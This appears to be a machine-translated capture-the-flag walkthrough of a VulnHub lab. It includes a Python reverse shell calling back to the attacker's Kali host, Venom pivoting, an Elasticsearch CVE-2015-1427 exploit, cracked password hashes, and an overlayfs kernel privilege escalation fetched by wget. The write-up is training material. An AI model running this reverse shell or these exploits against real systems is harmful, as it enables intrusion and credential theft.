Let’s hit the target 01

Time:2022-7-30

0x00 introduction to target

Target address:BoredHackerBlog: Social Network ~ VulnHub

Target difficulty: medium

Recommended virtual machine: VirtualBox

0x01 content introduction

  • Attack methods involved
    • Host discovery
    • Port scan
    • Service discovery
    • Path crawling
    • Code injection
    • Shell script
    • Intranet information collection
    • Intranet penetration
    • Vulnerability exploitation
    • Password cracking
    • Local rights raising
    • Attack code modification

0x02 environment construction

Download the target.ovaImport the file into VirtualBox

Ensure that the target and Kali are in the same network segment

Kali IP address:10.0.2.5

0x03 host discovery

Because the target and Kali are in the same network segment, the host discovery technology of layer 2 is preferred

Execute command:sudo arp-scan -l

image-20220314202611823

A total of 4 IP addresses are scanned, of which the first three are the IP addresses that VirtualBox needs to use for normal operation, so there is only the last IP address:10.0.2.15Is the IP of the target

After getting the target’s ip:10.0.2.15, scan the full port to detect which ports and services are opened on the target

Execute command:sudo nmap -p- 10.0.2.15

image-20220314203101933

From the scanning results, it is concluded that the target has opened two ports, and then the service version of these two ports is detected

Execute command:sudo nmap -p22,5000 -sV 10.0.2.15

image-20220314204142658

From the scanning results, it can be concluded that

  • 22Port is runningOpenSSHService, and the target should beUbuntuoperating system

  • 5000Port is runninghttpdServices, viaWerkzeugKeyword search shows that this is based onpythonconductwebThe underlying framework of development; This means that the programming language environment running on the server side ispython2.7, then it can be used if code execution vulnerabilities are found laterpythonScript toBounce shellTo gain control, etc

    image-20220314204722871

Since you are running a web application, open the browser to visit the website to see if there is a default page. If there is a default page, then see if there is an injection point

visit:http://10.0.2.15:5000

image-20220315180402427

It can be seen that this is a social networking site. Through simple security detection, it is found that there are no obvious known vulnerabilities in the default page, and there are no cross site scripting vulnerabilities, so there is no gain

When infiltrating web applications, a routine operation that must be done is: Web application path discoveryTo see whether the hidden path of those hidden pages contains the submission point of the function or other vulnerabilities

There are many crawling tools for web application paths, such aswindowsPlatformMitsurugi , used on Kali this timedirsearchThis tool

By crawling the web application path, we are likely to find the background address, so we can attack the background, which can help us find the breakthrough point of the target system with great probability

Execute command:dirsearch -u http://10.0.2.15:5000/

image-20220314215957810

After scanning, a path is found. Use the browser to access it:http://10.0.2.15:5000/admin

image-20220314220334459

Visit and find that this is a code execution page. Combined with the information collected above, we know that the server is runningpython2.7Programming language environment, so you can try to injectpythonCode to bounce shell

0x04 Python bounce shell

Search with search enginePython bounce shellMany contents can be found, such as:Python bounce shell_ Rebound shell summary_ Hepu’s blog CSDN blog

image-20220314221129890

#The general meaning of the red box part is to create an interactive SH and a TCP connection to 192.168.118.128, and then redirect the input and output errors of SH to the process occupying port 5555 at 192.168.118.128

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);  #  Create socket; AF_ INET(TCP/IP – IPv4); SOCK_ Stream (TCP stream)
s.connect(("192.168.118.128",5555));  #  IP address and port to connect
os.dup2(s.fileno(),0);  #  os. The dup2 () method is used to copy one file descriptor FD to another fd2
os.dup2(s.fileno(),1);  #  The fileno () method returns an integer file descriptor (FD integer), which can be used for i/o operations of the underlying operating system
os.dup2(s.fileno(),2);  #  Use fileno() to return an integer file descriptor, and use os.dup2 (s.fileno(), 0) to copy the integer file descriptor to the following 0. The three dup2 functions redirect the socket to standard input, standard input, and standard error output successively.
p=subprocess. call(["/bin/sh","-i"]);  #  Subprocess. Call() executes the command provided by the parameter and returns the status of the command, 0 or non-0
                                      #It can be ["/bin/bash", "-i"] or ["/bin/sh", "-i"]

Reference is as follows

Check Kali’s own IP

Execute command:ip a

image-20220314223836000

usencStart listening

Execute command:nc -nvlp 4444

image-20220319011615077

Then execute on the web pagepythonRebound shell code, here only["/bin/sh","-i"]It can run successfully. Pay attention to change the IP address to Kali’s IP address and the port toncListening port

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

image-20220314224345884

Click the page buttonTest codeAfter that,ncThe listener responded and got a rebound shell

image-20220314224613973

Simply execute the command to view the current path and account permissions

image-20220314224827748

Fortunately, I got itrootPermission, but is it true?

0x05 judge whether it is in the docker container

Dockerfile is a text file used to build images. The text content contains instructions and instructions required to build images one by one.

Dockerfile is usually used as a template file for the standardized deployment of docker container in the production environment and the deployment of the development environment. This template file will contain a series of information about how to import the docker image, how to configure the docker image, what software packages to install, and what service items to modify, etc; As a developer, you can distribute the template file to the deployment personnel of the application, so that you can deploy docker containers in a unified, standardized and consistent mass on the server of the production environment. In a word, dockerfile is a template file for standardized deployment.

uselsI saw it when I orderedDockerfileDocuments, does it mean obtainedrootThe operating system of permission is actually adockerSystem in container

Check it outDockerfileDocument content

Execute command:cat Dockerfile

image-20220314230321436

#docker build -t socnet .
#docker run -td --rm -p 8080:8080 socnet
From python:2.7-alpine \from: pull the image from the docker hub or the local repository as the basic image. Alpine is suitable for the basic image, which is less than 5m
Copy. /app # copy: copy files or directories into containers, similar to add, but without the function of automatic download or decompression
Workdir /app 35; workdir: switch the currently executed working directory
RUN pip install -r requirements. Txt # run: any command will be executed in the new layer above the current image and the results will be submitted. The generated submission image will be used for the next dockerfile
CMD ["Python", "/app/main.py"] \cmd: the command started by the container. If there are multiple commands, the last one shall prevail. You can also provide parameters for entrypoint

reference resources:Access road of dockerfile_ Peithon’s blog CSDN blog_ dockerfile run

You can see thisDockerfileThe content of the file is a standard dockerfile template file, which will be deeper after viewing. This is adockerSystematic suspicion

Real hammer, these are two methods (commands) of a docker container

  1. Method 1 (90%): check whether the root directory of the system exists.dockerenvFile, execute command:ls /.dockerenv

    image-20220314231715308

  2. Method 2 (100%): View/proc/1/cgroupFile, execute command:cat /proc/1/cgroup

    If something similar to the following appears, you can be 100% sure that this is adockerContainer system, anddockerThe hash value of the container is placed later

    Reason: after the Linux system is started, the PID 1 represents the initialization ID of the computer system. When the CGroup file that initializes the PID clearly contains the docker image instruction information, it is 100% proof that the current system is a docker container

    image-20220314232157850

This is the real hammer. The root account permissions obtained are in the docker container

0x06 intranet host discovery

View the IP address of the current docker container system

Execute command:ip a

image-20220314232935701

Get the IP address:172.17.0.2, different from the target IP that launched the attack before:10.0.2.15, which further confirms that this is adockerContainer systems, because their IP addresses are different

Now the network segment where the docker container is located can be regarded as the intranet segment,The common idea of the next step is to find out whether there are other hosts in the intranet? If there are other hosts, are there known vulnerabilities? Can these vulnerabilities be used to attack more intranet systems?

The host is found on the intranet. There are no many tools in Kali on the target. UsepingThe command is more appropriate. The subnet mask is 16 bits. Theoretically, there are 65535 IP addresses. It is unrealistic to Ping one by one manually, which requires the help of automated tools,A relatively simple method is to write a script that uses a loop to Ping the specified intranet segment

#Scan 172.17.1.1 - 172.17.254.254 and extract the IP with packet return
for i in $(seq 1 254);do for j in $(seq 1 254);do ping -c 1 172.17.$i.$j | grep "ttl";done;done

Because there are not so many target drones here

Execute command:for i in $(seq 1 10);do ping -c 1 172.17.0.$i | grep "ttl";done

image-20220315154619576

Remove after a scan172.17.0.2It is outside the machine. A total of 2 surviving IP addresses are scanned. Next, you need to172.17.0.1and172.17.0.3Conduct port scanning to see what services are opened on them, whether there are loopholes, and whether they can penetrate

0x07 intranet penetration

Because 172.17 is in the intranet segment, Kali cannot directly access it. To solve this problem, we need to use the intranet penetration technology to connect the network route between Kali and 172.17 intranet

Using venom, we can easily establish a tunnel between Kali and the intranet, and then generate an agent based on this tunnel, so that many tools in Kali can access the intranet of the target through this agent

venomTool GitHub address:GitHub – Dliv3/Venom: Venom – A Multi-hop Proxy for Penetration Testers

Download firstvenomCompress the package into Kali and decompress it

image-20220315160206228

View the version of the target system

Execute command:uname -a

image-20220315161152732

Get the target system isLinux 64Bit, selectvenominagent_linux_x64This program

image-20220315161503421

takeagent_linux_x64This client is transferred to the target system, and the corresponding server is run on this machineadmin_linux_x64

Kali local operationadmin_linux_x64, listening9999port

Execute command:./admin_linux_x64 -lport 9999

image-20220315161925710

The target system needs to obtainvenomClient, and then run the client to connect to the server, so as to establish a tunnel

Start the HTTP service on Kali, and then pass it on the target systemwgetCommand to getagent_linux_x64Client program

Start the HTTP service on Kali and execute the command:python3 -m http.server 80

image-20220315162432324

Target system usagewgetGet client program

Execute command:wget http://10.0.2.5/agent_linux_x64

image-20220315162702225

Give executable permission

Execute command:chmod +x agent_linux_x64

image-20220315163113752

Start the client program, connect to the server, and establish a connection

Execute command:./agent_linux_x64 -rhost 10.0.2.5 -rport 9999

image-20220315163337986

image-20220315163544426

Server startsocksListen

image-20220315163934520

This enables listening on Kali1080Portedsocks5agent

In order for all tools on Kali to hang agents to access the intranet, you also need to useproxychainsThis tool

modifyproxychainsConfiguration file of, configuring agent type, IP, port

Execute command:sudo vim /etc/proxychains4.conf

image-20220315164809114

0x08 intranet port scanning

Use NAMP for intranet IP:172.17.0.1and172.17.0.3Perform port scan

Execute command:proxychains nmap -Pn -sT 172.17.0.1

image-20220315165341382

The scan results show that the ports 22 and 5000 are open. Scan the service versions of 22 and 5000

Execute command:proxychains nmap -p22,5000 -Pn -sT -sV 172.17.0.1

image-20220315165645359

The scanning result is familiar, which is exactly the same as the scanning result of 10.0.2.15

Visit the 5000 port Kali of 172.17.0.1 through the browser

To facilitate switching agents, you can install them in Firefox browserFoxyProxy StandardExtension, extension address:FoxyProxy standard download

image-20220315170230490

FoxyProxy standard extension adds Socks5 proxy

image-20220315170434402

image-20220315170514365

image-20220315170618225

Browser uses proxy

image-20220315170928443

Access Intranet172.17.0.1:5000

image-20220315182109825

Displayed content and previous access http://10.0.2.15:5000 The contents displayed are exactly the same, and even the data of manual test can be seen. It shows that 172.17.0.1 is the host machine of 10.0.2.15, but 172.17.0.1 is the IP for the container intranet, so 172.17.0.1 is the target machine to be attacked

Next, continue to scan the port of 172.17.0.3

Execute command:proxychains nmap -Pn -sT 172.17.0.3

image-20220315184740930

The scan result shows that only port 9200 is open. Scan the services running on this port

Execute command:proxychains nmap -p9200 -Pn -sT -sV 172.17.0.3

image-20220315185014746

According to the scanning results, elasticsearch is running on 9200, and the version is 1.4.2

0x09 Elasticsearch RCE

Elasticsearch has had several very serious vulnerabilities in its historical versions, the most serious of which are some rce remote code execution vulnerabilities

usesearchsploitSearch whether Kali contains known elasticsearch exploit code

Execute command:searchsploit Elasticsearch

image-20220315190258086

The first two in the search results are remote code execution vulnerabilities. You can first copy these two vulnerabilities and try one by one to see whether you can break into elasticsearch server

First, try 36337.py, a vulnerability exploit code, and copy it to the current directory

Execute command:cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

image-20220315191230536

You can simply check this Python script to see how to exploit vulnerabilities

image-20220315191402461

You can see that this script is written in python2

Run this script and execute the code:python2 36337.py

image-20220315191610775

Get the IP of the target to be added later through the prompt

Execute the command again:proxychains python2 36337.py 172.17.0.3

image-20220315191817793

Soon got the result, try to inputidCommand to view the obtained account permissions

Execute command:id

image-20220315191954324

It was found that the script exited the operation with an error, so we had to find the problem and solve the error. From the prompt information, we can conclude that the number of this vulnerability isCVE-2015-1427

Search with search engineCVE-2015-1427, see how to use it. Reference link:Cve-2015-1427 (groovy sandbox bypass & & Code Execution Vulnerability) – smile 996 – blog Garden (cnblogs.com)

image-20220315192441131

The steps to exploit vulnerabilities are

  1. insert data
  2. Construct the payload with the data just inserted

Now let’s take a look at the vulnerability exploitation code copied from Kali again

Execute command:vim 36337.py

image-20220315192955494

Comparing the payload in the reference link with the payload in the python script, we can find that most of the contents are the same, the only difference is the key in the payload used in the reference linktest#It is inserted into elasticsearch in advance, and the key in payload in Python scriptlupinIf it is not inserted into elasticsearch in advance, it willlupinAfter inserting into elasticsearch, can this Python script run normally? It’s worth trying

useburpsuiteHang up the Socks5 agent, send a post request to elasticsearch, and insert datalupin

Open firstburpsuite

image-20220315193821316

seeburpsuiteProxy port

image-20220315194136340

to configureburpsuiteUsing socks proxy

image-20220315194856194

Configure browser usageburpsuiteagent

image-20220315194343059

image-20220315194451530

Access with browser http://172.17.0.3:9200

image-20220315231208502

takeburpsuiteThe caught request packet is sent toRepeatermodular

Modify the HTTP packet content to insertlupinFormat, click send

image-20220315231550155

After the creation is successful, try to execute the command again:proxychains python2 36337.py 172.17.0.3

image-20220315231804320

idCommand execution succeeded! Got another onerootAccount, but this is only the root permission of the container system

Execute command:cat /proc/1/cgroup

image-20220315232241024

0x0a kernel vulnerability authorization

After searching for information collected in this container system, a file namedpasswordsFile for

Execute command:ls /

image-20220315232448038

Does it contain a more confidential password? Out of curiosity

Execute command:cat /passwords

image-20220315232652508

It is found that this is indeed an account and password file, with the account number in the front and the hash value of the password in the back

Through the MD5 ciphertext query website on the Internet, the plaintext corresponding to all ciphertexts was queried. Query link:MD5 free online decryption and cracking_ MD5 online encryption -somd5

account number Password (ciphertext) Password (clear text)
john 3f8184a7343664553fcb5337a3138814 1337hack
test 861f194e9d6118f3d942a72be3e51749 1234test
admin 670c3bbc209a18dde5446e5e6c1f1d5b 1111pass
root b3d34352fc26117979deabdf1b9b6354 1234pass
jane 5c158b60ed97c723b673529b8a3cf72b 1234jane

With these accounts and passwords, you can try to log in to the IP address with port 22 open, bearing the brunt10.0.2.15

After a try, I was pleasantly surprised to find the accountjohnCan successfully log in to10.0.2.15Unfortunately, none of the others can

Execute command:ssh [email protected]

image-20220315233720888

Login to the target successfully

account numberjohnAt present, it is the only account that can be used. See if this account can promote itself toroot, if you can, this shooting will be completed

Execute command:sudo -s

image-20220315234101765

Unfortunately not, nosudoPermissions for

If you still want to obtain root permission, it’s nothing more than local authorization

There are many ways to raise rights locally, but the main way is to use kernel vulnerabilities to raise rights

Check the system kernel and execute the command:uname -a

image-20220315234406002

You can see that the kernel version used by the target system is 3.13, a very old version. For such an old version, there are generally kernel vulnerabilities

ReusesearchsploitSearch aboutlinux 3.13Exploit code

Execute command:searchsploit linux 3.13

image-20220315234913385

Search a lot of results, and choose a vulnerability exploitation code with local rights

In the real penetration scenario and in the real project process, many exploit versions may be found in this link, and we need to try on the target system one by one

For example, use37292.cCopy this exploit version to the current directory first

Execute command:cp /usr/share/exploitdb/exploits/linux/local/37292.c .

image-20220315235353332

Check the code of this file

Execute command:vim 37292.c

image-20220315235806784

By checking the description, it is found that this is a C language source code file, which needs to be used before runninggccCompile first

However, execute the command on the target system:gcc

image-20220315235943865

The result shows that GCC is not installed on the target system, so it needs to be compiled on Kali first, and then transferred to the target target machine for operation

Before running any exploit code on the target aircraft, it is strongly recommended to read the exploit code to be executed first

Check the source code again and execute the command:vim 37292.c

image-20220316000723238

Discover by viewing the source code

  1. On page139-147OK, it is executed again through C codegccCommand, willofs-lib.cCompile asofs-lib.soFile, so even if it is compiled in advance on Kali, when running on the target system, it is not installed on the target systemgccIt will still report an error; There are many solutions. The relatively simple and direct way is to modify the source code content, delete the compiled part, and then look for ready-made ones in KaliOfs lib so file
  2. Section148Line, read/tmp/ofs-lib.soFile, so when executing on the target system, you need toofs-lib.soFile intotmpDirectory to successfully read this file

Modify the source code file and delete the original No139-147Line, the modified content is as follows

image-20220316001313097

Compile the modified C source code

Execute command:gcc -o exp 37292.c

image-20220316001424956

Some warnings during compilation are harmless and will not affect the final execution result

Find out whether there is in Kaliofs-lib.sofile

Execute command:locate ofs-lib.so

image-20220316001759350

It turns out that it does exist. Copy it to the current directory

Execute command:cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .

image-20220316001953858

Start the HTTP service on Kali and pass through the targetwgetCommand to download these two files

Start the HTTP service and execute the command:python3 -m http.server 80

image-20220316002140117

The target aircraft downloads these two files

Execute command:

  • wget http://10.0.2.5/exp

  • wget http://10.0.2.5/ofs-lib.so

image-20220316002341071

To ensure successful operation, you need toofs-lib.soMove to/tmpDirectory, simply move both files directly to/tmpUnder the directory

Execute command:mv * /tmp

image-20220316002739917

giveexpExecutable permissions

Execute command:chmod +x exp

image-20220316002936170

implementexpProgram, upgrade permissions

Execute command:./exp

image-20220316003123165

Congratulations, successfully upgraded to root authority, and this shooting is successfully completed!

0x0b summary

  • Text overview of shooting process

    1. First perform host discovery, and then perform port scanning and service scanning on the discovered hosts
    2. Found on the target after scanning5000Port runs a web application, try to use the browser to access this web application
    3. There are no known vulnerabilities in the default page of the web application. Next, usedirsearchCommand to probe the web application path
    4. Found one/adminThe path of the background. There is a Remote Code Execution Vulnerability in this background page. Using this vulnerability, a rebound shell of the target system is obtained
    5. But after getting the shell, I found myself trapped in a docker container system. Based on this container system, I found the host of the IP address segment of the intranet
    6. During the discovery of Intranet hosts, two IP addresses were identified:172.17.0.1and172.17.0.3
    7. Then an intranet penetration tunnel was established and openedsocksThe agent scans all ports and services of the host that has been detected to be alive in the intranet
    8. During scanning, it is found that172.17.0.3It’s on9200Port. The corresponding application isElasticsearch
    9. Try rightElasticsearchMake use of existing vulnerabilities and successfully win172.17.0.3This host
    10. Continue to collect information in this host and find a file namedpasswordsfile
    11. Learned from the contents of the documentjohnThe hash value of the account number and password is queried through the online password cracking tool
    12. After getting the account and password, I tried to log in on all hosts with port 22 on the intranet. The final result was that I successfully logged in to the target system
    13. But after logging in successfully, I encountered another problem, account numberjohnJust an ordinary account, Nosudojurisdiction
    14. Have to carry out the operation of raising rights, throughuname -aIt is found that the kernel of the target system is a very old version, and a code for exploiting kernel vulnerabilities is selected
    15. However, this exploit code cannot be performed on the target systemgccTherefore, the source code is modified on Kali and the call is deletedgccCompile part of the code after compilation, and find the dependent binary library file in Kali
    16. These two files are transferred to the target system together. By executing the compiled program on the target system, we finally get therootjurisdiction
  • Video link corresponding to the shooting process:Click to view